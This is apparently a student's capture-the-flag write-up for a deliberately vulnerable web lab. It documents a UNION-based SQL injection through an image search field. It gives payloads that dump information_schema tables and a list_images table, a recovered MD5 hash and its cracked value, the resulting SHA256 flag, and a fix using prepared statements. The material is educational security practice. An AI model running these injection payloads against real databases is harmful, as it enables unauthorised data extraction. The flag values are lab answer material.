search interpet sql like in usr sql injection 

we use same technique we find this 

we use this to show all tables
0 UNION  select table_name, column_name FROM information_schema.columns  


we ask for 2 paramets in sql select (url , comment ) otherwise the sql request returns nothing.


ID: 0 UNION select url, comment FROM list_images 
Title: If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46
Url : borntosec.ddns.net/images.png

md5 decrypte : 1928e8083cf461a51303633093573c46 : albatroz
sha256 encrypt : Sha256(albatroz) = f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
so we find this flag : f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188

fix : use php pdo to clean sql an orm and une requete perpare 